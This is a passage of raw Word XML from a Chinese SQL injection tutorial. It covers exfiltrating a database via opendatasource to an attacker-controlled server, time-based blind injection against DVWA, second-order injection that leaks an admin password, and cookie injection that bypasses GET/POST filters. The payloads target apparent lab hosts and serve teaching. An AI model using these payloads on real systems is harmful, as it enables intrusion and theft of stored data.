            <wp:docPr id="116" name="图片 16" descr="{75FF426C-BFC9-43D3-8356-7693DEADB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5FF426C-BFC9-43D3-8356-7693DEADB810}"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId179"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3416300" cy="1894840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD7D470"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获取注入数据库当前库所有信息的工作就要一步到位了，注入语句如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="5AC21C86" w14:textId="77777777" w:rsidTr="00591D1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61FDA57A" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00BA03C5" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r w:rsidRPr="00BA03C5">
              <w:t xml:space="preserve">insert into </w:t>
            </w:r>
            <w:r w:rsidRPr="00BA03C5">
              <w:lastRenderedPageBreak/>
              <w:t>opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.bbsuser select * from [bbsuser] --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63CD2D66"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在注入点上执行就是：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="0DFDCCC0" w14:textId="77777777" w:rsidTr="00591D1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51539166" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00BA03C5" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r w:rsidRPr="00BA03C5">
              <w:t>http://192.168.8.10/web/f.asp?password=1'insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.bbsuser select * from [bbsuser] --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CA49B4B"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例是图12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E67945"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noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4495640A" wp14:editId="322BBBDC">
            <wp:extent cx="5713095" cy="1836420"/>
            <wp:effectExtent l="19050" t="0" r="1905" b="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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5713095" cy="1836420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C70A8E" w14:textId="77777777" w:rsidR="00A103ED"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我们来看一下终竟成没有成功，赶快到192.168.8.20上的lcx.dbo.bbsuser上去抓个图，自然是成功了的，图13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BECD627" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52D2B3CC" wp14:editId="784880E2">
            <wp:extent cx="4403725" cy="1828800"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4403725" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E09E03" w14:textId="77777777" w:rsidR="00340520" w:rsidRPr="00CD76A0" w:rsidRDefault="00A103ED"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这样我们一步一步地把注入点的当前库所有的信息全部搬到我们本地来了。最后一步我要说明的是你获取字段值的时候，建的表名、列名不一定要与注入库的完全一样，只要类型相符就可以了。可能你说我的方法虽然不错，但毕竟没有工具爽。</w:t>
      </w:r>
      <w:r w:rsidR="00F34625" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里只是给大家讲解一下突破回显的思路.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1ABF12" w14:textId="77777777" w:rsidR="00330FF8" w:rsidRDefault="0000486B" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0000486B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>判断</w:t>
      </w:r>
      <w:r w:rsidRPr="0000486B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="0000486B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行的异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020D12F" w14:textId="77777777" w:rsidR="0000486B" w:rsidRPr="00CD76A0" w:rsidRDefault="0000486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测试代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605C207" w14:textId="77777777" w:rsidR="0000486B" w:rsidRPr="00CD76A0" w:rsidRDefault="00D269A4" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId182" w:history="1">
        <w:r w:rsidR="0000486B" w:rsidRPr="00CD76A0">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1sleep%2850%29&amp;Submit=Submit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35F16B19" w14:textId="77777777" w:rsidR="0000486B" w:rsidRPr="00893FB6" w:rsidRDefault="0000486B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10854DE6" wp14:editId="650A2454">
            <wp:extent cx="5274310" cy="3479165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>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79165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A66EC9" w14:textId="77777777" w:rsidR="0000486B" w:rsidRPr="006472F7" w:rsidRDefault="0000486B"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如果sleep()不行的话，记得试试benchmark()好像sleep在mysql5.0以前都不支持，但benchmark()支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F4BA2F" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRDefault="006472F7" w:rsidP="006472F7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.3</w:t>
      </w:r>
      <w:r w:rsidR="00951D74">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00951D74">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009E61BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二阶</w:t>
      </w:r>
      <w:r w:rsidR="009E61BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="009E61BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57977A82" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="009E61BB" w:rsidP="006472F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一种特别有益的避开过滤的方法与二阶SQL注入(second-order SQL injection)有关。当数据首次插人数据库中时，许多应用程序能够安全处理这些数据。但是，一旦数据存储在数据库中，随后应用程序本身或其他后端进程可能会以危险的方式处理这些数据。许多这类应用程序并不像面向因特网的主要应用程序一样安全，但却拥有较高权限的数据库账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6943BA78"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一些应用程序中，用户输人在到达时通过转义单引号来进行确认。在前面搜索书籍的示例中，这种方法明显有效。当用户输人搜索项O'Rei1ly时，应用程序执行以下查询:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6655875A" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="009E61BB" w:rsidP="00FF1B9E">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SELECT author,title,year FROM books WHERE publisher='0''Reilly'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3667E6"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在这个查询中，用户提交的单引号被转换为两个单引号，因而传送给数据库的搜索项与用户最初输人的表达式具有相同的字符含义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143CEB74" w14:textId="77777777" w:rsidR="002D07FF"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与单引号配对方法有关的问题出现在更复杂的情形中，此时同一个数据项被提交给几个SQL查询，然后写人数据库被几次读取。这是证明简单输入确认相对于边界确认存在不足的一个示例</w:t>
      </w:r>
      <w:r w:rsidR="002D07FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00216F3A"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回到前面那个允许用户自我注册并且在一个INSERT语句中存在SQL注人漏洞的应用程序。假设开发者将修复出现在用户数据中的所有单引号配对导致的漏洞。注册用户名fool来建立如下查询，它不会在数据库中造成问题:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB4AC62"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INSERT INTO users  (username,password,ID,privs)VALUES('foo''','secret',2248,1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745FACE" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="009E61BB" w:rsidP="00200887">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"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目前为止一切正常。然而，假设应用程序还执行密码修改功能，那么只有通过验证的用户才能够访问这项功能，而且为了加强保护，应用程序要求用户提交原始密码。然后应用程序从数据库中提取用户的当前密码，并对两个字符串进行比较，核对用户提供的密码是否正确。要完成核对任务，它首先要从数据库提取用户的用户名，然后建立如下查询:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B3727A"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SELECT password FROM users WHERE username='foo''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B6A4C"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因为保存在数据库中的用户名是字面量字符串foo'，当应用程序提出访问要求时，数据库即返回这个值;只有在字符串被传送给数据库时才使用配对的转义序列。因此，当应用程序重复使用这个字符串并将它嵌人到另一个查询中时，就会造成一个SQL注人漏洞，用户最初的恶意输人就被嵌人到查询中。当用户尝试修改密码时，应用程序返回以下消息，暴露了上述缺陷:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47698D06"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Unclosed quotation mark before the character string'foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3753E77D"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要利用这种漏洞，攻击者只需注册一个包含专门设计的输人用户名，然后尝试修改密码。例如，如果注册如下用户名:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E464C1"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or 1 in(select password from users where username='admin')--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF9F862"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注册步骤将会被应用程序安全处理。如果攻击者尝试修改密码，他注人的查询就会执行，导致生成以下消息，泄露管理员的密码:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBAB13F"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Microsoft OLE DB Provider for ODBC Drivers error'80040e07'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212EC270"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Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E6029B" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRPr="00CD76A0" w:rsidRDefault="009E61BB" w:rsidP="00901209">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kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">      the varchar value’fme69’to a column of data type int.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FEA577" w14:textId="77777777" w:rsidR="009E61BB" w:rsidRDefault="009E61BB" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击者已经成功避开旨在阻止SQL注人攻击的输人确认，现在他能够在数据库中执行任意查询并获得查询结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1E7FB3" w14:textId="77777777" w:rsidR="002D4575" w:rsidRDefault="002D4575" w:rsidP="002D4575">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  cookices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0015DC15" w14:textId="77777777" w:rsidR="007A26EA" w:rsidRDefault="007A26EA" w:rsidP="007A26EA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大家都知道注入分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">:GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入，当一个站增加了防注入程序之后，很多朋友都会放弃，其实大家可以试试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入，下面实例就是</w:t>
      </w:r>
      <w:r w:rsidR="005C49D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="005C49D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防注入，但忘了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入。在演示之前大家先了解一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据提交方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A8D463" w14:textId="77777777" w:rsidR="005C49D0" w:rsidRDefault="005C49D0" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（全部接受）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">request.querystring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">request.form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.cookie cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8D41A" w14:textId="77777777" w:rsidR="005C49D0" w:rsidRDefault="005C49D0" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C49D0">
        <w:t xml:space="preserve"> $_REQUEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（全部接受）、</w:t>
      </w:r>
      <w:r w:rsidRPr="005C49D0">
        <w:t xml:space="preserve">$_GET $_POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、</w:t>
      </w:r>
      <w:r w:rsidRPr="005C49D0">
        <w:t>$_COOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131DAD69" w14:textId="77777777" w:rsidR="002C6909" w:rsidRDefault="002C6909" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例实战测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74923EF4" w14:textId="77777777" w:rsidR="005F6945" w:rsidRDefault="002C6909" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开注入地址</w:t>
      </w:r>
      <w:r w:rsidR="005F6945" w:rsidRPr="005F6945">
        <w:t xml:space="preserve"> http://192.168.1.113:999/productshow.asp?id=59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2985FE1E" w14:textId="77777777" w:rsidR="005F6945" w:rsidRDefault="00A8022C" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包分析注入</w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式注入都被过滤掉，把</w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改成</w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COOKICE</w:t>
      </w:r>
      <w:r w:rsidR="002C6909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入没有被过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147298E5" w14:textId="77777777" w:rsidR="00D17DB5" w:rsidRDefault="002B146D" w:rsidP="005C49D0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5120980F" wp14:editId="6A7666B7">
            <wp:extent cx="5278120" cy="3715234"/>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5278120" cy="3715234"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
